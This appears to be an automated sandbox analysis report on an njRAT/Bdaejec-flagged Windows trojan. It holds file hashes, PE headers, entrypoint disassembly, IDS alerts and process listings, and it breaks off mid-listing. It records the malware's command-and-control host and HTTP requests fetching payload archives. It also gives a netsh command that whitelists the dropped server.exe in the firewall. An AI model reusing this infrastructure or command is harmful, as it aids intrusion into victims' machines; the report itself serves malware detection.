SSDEEP:	24576:E7JjITr1aZUsd/MedVJndc9B0S+fenBvK8k:g81aZTdvffenk8
MD5:	16AB569E9D84F0A2C9AACD47D4998D84
SHA1:	DF051511743F94A52BDBC270C4E5BF0D303D6975
SHA-256:	7FB6D8E7D8BD58F1445F0C105D609BD3DB7445D55D9ABEFC18E5E78C06B7A96F
SHA-512:	614447286EB0C439DD5EB183E6175F33EAF567475BFEFB52CFF2B543ACE319963D099C6AD3190A31AF782395C5CC9B3DF34BFC9F8EC7EF0D387106454EFE288D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.e..............................9.. ........@.. ........................:.. ........@... .. .... .. .................. .+...............................+.................................................................................................. ....... ..............@............ ..........................@............ ).........................@....data..............................@.....d.u...`....9..B...F.............. .....fl...:.v.2.........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\SysWOW64\Explower.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\server.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1214464
Entropy (8bit):	7.958532392669138
Encrypted:	false
SSDEEP:	24576:E7JjITr1aZUsd/MedVJndc9B0S+fenBvK8k:g81aZTdvffenk8
MD5:	16AB569E9D84F0A2C9AACD47D4998D84
SHA1:	DF051511743F94A52BDBC270C4E5BF0D303D6975
SHA-256:	7FB6D8E7D8BD58F1445F0C105D609BD3DB7445D55D9ABEFC18E5E78C06B7A96F
SHA-512:	614447286EB0C439DD5EB183E6175F33EAF567475BFEFB52CFF2B543ACE319963D099C6AD3190A31AF782395C5CC9B3DF34BFC9F8EC7EF0D387106454EFE288D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.e..............................9.. ........@.. ........................:.. ........@... .. .... .. .................. .+...............................+.................................................................................................. ....... ..............@............ ..........................@............ ).........................@....data..............................@.....d.u...`....9..B...F.............. .....fl...:.v.2.........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Users\user\AppData\Local\Temp\RRqyIX.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.469008114169889
Encrypted:	false
SSDEEP:	6144:9zZfpi6ceLPx9skLmb0fBZWSP3aJG8nAgeiJRMMhA2zX4WABluuNwjDH5S/:VZHtBZWOKnMM6bFpCj4
MD5:	16D7CA29758C0D09604A6597E91E058D
SHA1:	9AB0A1718F263E4AFE8F089E4BA766559847AB2B
SHA-256:	19EC8AA4574AC4D018A98201BBF94F5970B71FF4DBA90B2B538EA2048D8024E7
SHA-512:	B7123EB0730351C5D765B9B1301DB4642C51BC8269F3E3831B2D9F66E7A23E1EF3459A18E50A1BBD90207AAC1042B5F19221666EF479D3C7B7E9577598B7FFE2
Malicious:	false
Preview:	regfI...I....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.I8.................................................................................................................................................................................................................................................................................................................................................../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\system.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\server.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1214464
Entropy (8bit):	7.958532392669138
Encrypted:	false
SSDEEP:	24576:E7JjITr1aZUsd/MedVJndc9B0S+fenBvK8k:g81aZTdvffenk8
MD5:	16AB569E9D84F0A2C9AACD47D4998D84
SHA1:	DF051511743F94A52BDBC270C4E5BF0D303D6975
SHA-256:	7FB6D8E7D8BD58F1445F0C105D609BD3DB7445D55D9ABEFC18E5E78C06B7A96F
SHA-512:	614447286EB0C439DD5EB183E6175F33EAF567475BFEFB52CFF2B543ACE319963D099C6AD3190A31AF782395C5CC9B3DF34BFC9F8EC7EF0D387106454EFE288D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.e..............................9.. ........@.. ........................:.. ........@... .. .... .. .................. .+...............................+.................................................................................................. ....... ..............@............ ..........................@............ ).........................@....data..............................@.....d.u...`....9..B...F.............. .....fl...:.v.2.........................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Windows\SysWOW64\netsh.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	313
Entropy (8bit):	4.971939296804078
Encrypted:	false
SSDEEP:	6:/ojfKsUTGN8Ypox42k9L+DbGMKeQE+vigqAZs2E+AYeDPO+Yswyha:wjPIGNrkHk9iaeIM6ADDPOHyha
MD5:	689E2126A85BF55121488295EE068FA1
SHA1:	09BAAA253A49D80C18326DFBCA106551EBF22DD6
SHA-256:	D968A966EF474068E41256321F77807A042F1965744633D37A203A705662EC25
SHA-512:	C3736A8FC7E6573FA1B26FE6A901C05EE85C55A4A276F8F569D9EADC9A58BEC507D1BB90DBF9EA62AE79A6783178C69304187D6B90441D82E46F5F56172B5C5C
Malicious:	false
Preview:	..IMPORTANT: Command executed successfully...However, "netsh firewall" is deprecated;..use "netsh advfirewall firewall" instead...For more information on using "netsh advfirewall firewall" commands..instead of "netsh firewall", see KB article 947709..at https://go.microsoft.com/fwlink/?linkid=121488 .....Ok.....

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.958532392669138
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	LisectAVT_2403002B_366.exe
File size:	1'214'464 bytes
MD5:	16ab569e9d84f0a2c9aacd47d4998d84
SHA1:	df051511743f94a52bdbc270c4e5bf0d303d6975
SHA256:	7fb6d8e7d8bd58f1445f0c105d609bd3db7445d55d9abefc18e5e78c06b7a96f
SHA512:	614447286eb0c439dd5eb183e6175f33eaf567475bfefb52cff2b543ace319963d099c6ad3190a31af782395c5cc9b3df34bfc9f8ec7ef0d387106454efe288d
SSDEEP:	24576:E7JjITr1aZUsd/MedVJndc9B0S+fenBvK8k:g81aZTdvffenk8
TLSH:	054533C316432A59EA2C30B5E4C6A06ADE7AF7D0639E46EF25F54571020C90B2DFA1FD
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.e..............................9.. ........@.. ........................:.. ........@... .. .... .. .................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x79a000
Entrypoint Section:	du
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x65FD64C5 [Fri Mar 22 11:00:21 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	2e5467cba76f44a088d39f78c5e807b6

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 0000016Ch
xor eax, eax
push ebx
push esi
push edi
mov dword ptr [ebp-24h], eax
mov dword ptr [ebp-10h], eax
mov dword ptr [ebp-14h], eax
mov dword ptr [ebp-08h], eax
mov dword ptr [ebp-0Ch], eax
mov dword ptr [ebp-20h], eax
mov dword ptr [ebp-18h], eax
mov dword ptr [ebp-48h], 79715252h
mov dword ptr [ebp-44h], 652E5849h
mov dword ptr [ebp-40h], 00006578h
mov dword ptr [ebp-3Ch], 00000000h
call 00007F69606275A5h
pop eax
add eax, 00000225h
mov dword ptr [ebp-04h], eax
mov eax, dword ptr fs:[00000030h]
mov dword ptr [ebp-28h], eax
mov eax, dword ptr [ebp-04h]
mov dword ptr [eax], E904C483h
mov eax, dword ptr [ebp-04h]
mov dword ptr [eax+04h], FFFFDDE7h
mov eax, dword ptr [ebp-28h]
mov eax, dword ptr [eax+0Ch]
mov eax, dword ptr [eax+1Ch]
mov eax, dword ptr [eax]
mov eax, dword ptr [eax+08h]
mov ecx, dword ptr [eax+3Ch]
mov ecx, dword ptr [ecx+eax+78h]
add ecx, eax
mov edi, dword ptr [ecx+1Ch]
mov ebx, dword ptr [ecx+20h]
mov esi, dword ptr [ecx+24h]
mov ecx, dword ptr [ecx+18h]
add esi, eax
add edi, eax
add ebx, eax
xor edx, edx
mov dword ptr [ebp-30h], esi
mov dword ptr [ebp-1Ch], edx
mov dword ptr [ebp-34h], ecx
cmp edx, dword ptr [ebp-34h]
jnc 00007F69606276EEh
movzx ecx, word ptr [esi+edx*2]
mov edx, dword ptr [ebx+edx*4]
mov esi, dword ptr [edi+ecx*4]
add edx, eax
mov ecx, dword ptr [edx]
add esi, eax
cmp ecx, 4D746547h
jne 00007F69606275F4h
cmp dword ptr [edx+04h], 6C75646Fh
jne 00007F69606275EBh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2b1020	0x210	.data
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2b1000	0xc	.data
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x2000	0x18000	0x8600	591649c120e289479abfcaccb7106825	False	0.9885144589552238	data	7.976487863015766	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x1a000	0x2000	0x200	7b5d72e3b82ada6b0153f1874d37a8b2	False	0.052734375	data	0.28109187076190567	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x1c000	0x292000	0x2e800	a22c9aa11e7ff846b9c904a2e3dc3f19	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.data	0x2ae000	0xec000	0xeb600	4a74da4e1e72a696fc312542fb1b10a0	False	0.9859962078465215	data	7.970274705878334	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
du	0x39a000	0x6000	0x4200	22efc0e63d720655b3ebacf37c33d89b	False	0.7774621212121212	data	6.934584666735054	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	GetModuleHandleA, GetProcAddress, ExitProcess, LoadLibraryA
user32.dll	MessageBoxA
advapi32.dll	RegCloseKey
oleaut32.dll	SysFreeString
gdi32.dll	CreateFontA
shell32.dll	ShellExecuteA
version.dll	GetFileVersionInfoA
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-25T13:56:12.378551+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49723	799	192.168.2.6	44.221.84.105
2024-07-25T13:55:53.012404+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49711	799	192.168.2.6	44.221.84.105
2024-07-25T13:56:00.834389+0200	TCP	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	49716	443	192.168.2.6	20.42.65.92
2024-07-25T13:56:15.343441+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49726	799	192.168.2.6	44.221.84.105
2024-07-25T13:56:21.691262+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49729	799	192.168.2.6	44.221.84.105
2024-07-25T13:56:26.240091+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49731	799	192.168.2.6	44.221.84.105
2024-07-25T13:56:18.589198+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49728	799	192.168.2.6	44.221.84.105
2024-07-25T13:55:52.186327+0200	UDP	2838522	ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup	64724	53	192.168.2.6	1.1.1.1
2024-07-25T13:56:46.196032+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49738	52.165.165.26	192.168.2.6
2024-07-25T13:55:56.754164+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49712	799	192.168.2.6	44.221.84.105
2024-07-25T13:56:08.565178+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49720	52.165.165.26	192.168.2.6

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 25, 2024 13:55:52.558504105 CEST	49711	799	192.168.2.6	44.221.84.105
Jul 25, 2024 13:55:52.563390017 CEST	799	49711	44.221.84.105	192.168.2.6
Jul 25, 2024 13:55:52.563488960 CEST	49711	799	192.168.2.6	44.221.84.105
Jul 25, 2024 13:55:52.569232941 CEST	49711	799	192.168.2.6	44.221.84.105
Jul 25, 2024 13:55:52.574099064 CEST	799	49711	44.221.84.105	192.168.2.6
Jul 25, 2024 13:55:53.012348890 CEST	799	49711	44.221.84.105	192.168.2.6
Jul 25, 2024 13:55:53.012403965 CEST	49711	799	192.168.2.6	44.221.84.105
Jul 25, 2024 13:55:53.014391899 CEST	799	49711	44.221.84.105	192.168.2.6
Jul 25, 2024 13:55:53.014436960 CEST	49711	799	192.168.2.6	44.221.84.105
Jul 25, 2024 13:55:53.050890923 CEST	49711	799	192.168.2.6	44.221.84.105
Jul 25, 2024 13:55:53.056250095 CEST	799	49711	44.221.84.105	192.168.2.6
Jul 25, 2024 13:55:56.358400106 CEST	49712	799	192.168.2.6	44.221.84.105
Jul 25, 2024 13:55:56.363395929 CEST	799	49712	44.221.84.105	192.168.2.6
Jul 25, 2024 13:55:56.363491058 CEST	49712	799	192.168.2.6	44.221.84.105
Jul 25, 2024 13:55:56.365510941 CEST	49712	799	192.168.2.6	44.221.84.105
Jul 25, 2024 13:55:56.370559931 CEST	799	49712	44.221.84.105	192.168.2.6
Jul 25, 2024 13:55:56.754077911 CEST	799	49712	44.221.84.105	192.168.2.6
Jul 25, 2024 13:55:56.754163980 CEST	49712	799	192.168.2.6	44.221.84.105
Jul 25, 2024 13:55:56.754252911 CEST	799	49712	44.221.84.105	192.168.2.6
Jul 25, 2024 13:55:56.754297972 CEST	49712	799	192.168.2.6	44.221.84.105
Jul 25, 2024 13:55:56.755501986 CEST	49712	799	192.168.2.6	44.221.84.105
Jul 25, 2024 13:55:56.760312080 CEST	799	49712	44.221.84.105	192.168.2.6
Jul 25, 2024 13:56:10.902092934 CEST	49723	799	192.168.2.6	44.221.84.105
Jul 25, 2024 13:56:11.942409992 CEST	799	49723	44.221.84.105	192.168.2.6
Jul 25, 2024 13:56:11.942651987 CEST	49723	799	192.168.2.6	44.221.84.105
Jul 25, 2024 13:56:11.994399071 CEST	49723	799	192.168.2.6	44.221.84.105
Jul 25, 2024 13:56:11.999238014 CEST	799	49723	44.221.84.105	192.168.2.6
Jul 25, 2024 13:56:12.378458023 CEST	799	49723	44.221.84.105	192.168.2.6
Jul 25, 2024 13:56:12.378483057 CEST	799	49723	44.221.84.105	192.168.2.6
Jul 25, 2024 13:56:12.378551006 CEST	49723	799	192.168.2.6	44.221.84.105
Jul 25, 2024 13:56:12.378551006 CEST	49723	799	192.168.2.6	44.221.84.105
Jul 25, 2024 13:56:12.380072117 CEST	49723	799	192.168.2.6	44.221.84.105
Jul 25, 2024 13:56:12.385665894 CEST	799	49723	44.221.84.105	192.168.2.6
Jul 25, 2024 13:56:14.931885958 CEST	49726	799	192.168.2.6	44.221.84.105
Jul 25, 2024 13:56:14.936845064 CEST	799	49726	44.221.84.105	192.168.2.6
Jul 25, 2024 13:56:14.940174103 CEST	49726	799	192.168.2.6	44.221.84.105
Jul 25, 2024 13:56:14.940496922 CEST	49726	799	192.168.2.6	44.221.84.105
Jul 25, 2024 13:56:14.946491003 CEST	799	49726	44.221.84.105	192.168.2.6
Jul 25, 2024 13:56:15.343003988 CEST	799	49726	44.221.84.105	192.168.2.6
Jul 25, 2024 13:56:15.343318939 CEST	799	49726	44.221.84.105	192.168.2.6
Jul 25, 2024 13:56:15.343441010 CEST	49726	799	192.168.2.6	44.221.84.105
Jul 25, 2024 13:56:15.351843119 CEST	49726	799	192.168.2.6	44.221.84.105
Jul 25, 2024 13:56:15.358522892 CEST	799	49726	44.221.84.105	192.168.2.6
Jul 25, 2024 13:56:18.179452896 CEST	49728	799	192.168.2.6	44.221.84.105
Jul 25, 2024 13:56:18.184431076 CEST	799	49728	44.221.84.105	192.168.2.6
Jul 25, 2024 13:56:18.184549093 CEST	49728	799	192.168.2.6	44.221.84.105
Jul 25, 2024 13:56:18.189269066 CEST	49728	799	192.168.2.6	44.221.84.105
Jul 25, 2024 13:56:18.194195032 CEST	799	49728	44.221.84.105	192.168.2.6
Jul 25, 2024 13:56:18.588788986 CEST	799	49728	44.221.84.105	192.168.2.6
Jul 25, 2024 13:56:18.589198112 CEST	49728	799	192.168.2.6	44.221.84.105
Jul 25, 2024 13:56:18.589476109 CEST	799	49728	44.221.84.105	192.168.2.6
Jul 25, 2024 13:56:18.589560986 CEST	49728	799	192.168.2.6	44.221.84.105
Jul 25, 2024 13:56:18.593493938 CEST	49728	799	192.168.2.6	44.221.84.105
Jul 25, 2024 13:56:18.599179983 CEST	799	49728	44.221.84.105	192.168.2.6
Jul 25, 2024 13:56:21.290570021 CEST	49729	799	192.168.2.6	44.221.84.105
Jul 25, 2024 13:56:21.295608044 CEST	799	49729	44.221.84.105	192.168.2.6
Jul 25, 2024 13:56:21.295711040 CEST	49729	799	192.168.2.6	44.221.84.105
Jul 25, 2024 13:56:21.295928001 CEST	49729	799	192.168.2.6	44.221.84.105
Jul 25, 2024 13:56:21.300760984 CEST	799	49729	44.221.84.105	192.168.2.6
Jul 25, 2024 13:56:21.691145897 CEST	799	49729	44.221.84.105	192.168.2.6
Jul 25, 2024 13:56:21.691246033 CEST	799	49729	44.221.84.105	192.168.2.6
Jul 25, 2024 13:56:21.691262007 CEST	49729	799	192.168.2.6	44.221.84.105
Jul 25, 2024 13:56:21.691292048 CEST	49729	799	192.168.2.6	44.221.84.105
Jul 25, 2024 13:56:21.735975027 CEST	49729	799	192.168.2.6	44.221.84.105
Jul 25, 2024 13:56:21.741028070 CEST	799	49729	44.221.84.105	192.168.2.6
Jul 25, 2024 13:56:25.799793005 CEST	49731	799	192.168.2.6	44.221.84.105
Jul 25, 2024 13:56:25.804848909 CEST	799	49731	44.221.84.105	192.168.2.6
Jul 25, 2024 13:56:25.804956913 CEST	49731	799	192.168.2.6	44.221.84.105
Jul 25, 2024 13:56:25.806689978 CEST	49731	799	192.168.2.6	44.221.84.105
Jul 25, 2024 13:56:25.812868118 CEST	799	49731	44.221.84.105	192.168.2.6
Jul 25, 2024 13:56:26.239958048 CEST	799	49731	44.221.84.105	192.168.2.6
Jul 25, 2024 13:56:26.240091085 CEST	49731	799	192.168.2.6	44.221.84.105
Jul 25, 2024 13:56:26.243132114 CEST	799	49731	44.221.84.105	192.168.2.6
Jul 25, 2024 13:56:26.243227005 CEST	49731	799	192.168.2.6	44.221.84.105
Jul 25, 2024 13:56:26.245373011 CEST	49731	799	192.168.2.6	44.221.84.105
Jul 25, 2024 13:56:26.254625082 CEST	799	49731	44.221.84.105	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 25, 2024 13:55:52.186326981 CEST	64724	53	192.168.2.6	1.1.1.1
Jul 25, 2024 13:55:52.373622894 CEST	53	64724	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 25, 2024 13:55:52.186326981 CEST	192.168.2.6	1.1.1.1	0xaffd	Standard query (0)	ddos.dnsnb8.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 25, 2024 13:55:52.373622894 CEST	1.1.1.1	192.168.2.6	0xaffd	No error (0)	ddos.dnsnb8.net		44.221.84.105	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ddos.dnsnb8.net:799

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49711	44.221.84.105	799	4888	C:\Users\user\AppData\Local\Temp\RRqyIX.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 13:55:52.569232941 CEST	288	OUT	GET /cj//k1.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49712	44.221.84.105	799	4888	C:\Users\user\AppData\Local\Temp\RRqyIX.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 13:55:56.365510941 CEST	288	OUT	GET /cj//k2.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49723	44.221.84.105	799	1216	C:\Users\user\AppData\Local\Temp\RRqyIX.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 13:56:11.994399071 CEST	288	OUT	GET /cj//k1.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49726	44.221.84.105	799	1216	C:\Users\user\AppData\Local\Temp\RRqyIX.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 13:56:14.940496922 CEST	288	OUT	GET /cj//k2.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49728	44.221.84.105	799	1216	C:\Users\user\AppData\Local\Temp\RRqyIX.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 13:56:18.189269066 CEST	288	OUT	GET /cj//k3.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49729	44.221.84.105	799	1216	C:\Users\user\AppData\Local\Temp\RRqyIX.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 13:56:21.295928001 CEST	288	OUT	GET /cj//k4.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49731	44.221.84.105	799	1216	C:\Users\user\AppData\Local\Temp\RRqyIX.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 13:56:25.806689978 CEST	288	OUT	GET /cj//k5.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Target ID:	0
Start time:	07:55:50
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\LisectAVT_2403002B_366.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\LisectAVT_2403002B_366.exe"
Imagebase:	0x600000
File size:	1'214'464 bytes
MD5 hash:	16AB569E9D84F0A2C9AACD47D4998D84
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp, Author: unknown Rule: Njrat, Description: detect njRAT in memory, Source: 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	07:55:50
Start date:	25/07/2024
Path:	C:\Users\user\AppData\Local\Temp\RRqyIX.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\RRqyIX.exe
Imagebase:	0xae0000
File size:	15'872 bytes
MD5 hash:	F7D21DE5C4E81341ECCD280C11DDCC9A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	07:55:53
Start date:	25/07/2024
Path:	C:\Users\user\AppData\Local\Temp\server.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\server.exe"
Imagebase:	0x9a0000
File size:	1'214'464 bytes
MD5 hash:	16AB569E9D84F0A2C9AACD47D4998D84
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000004.00000002.4628547568.0000000003D51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	07:55:55
Start date:	25/07/2024
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\server.exe" "server.exe" ENABLE
Imagebase:	0xa60000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	07:55:55
Start date:	25/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	07:55:56
Start date:	25/07/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
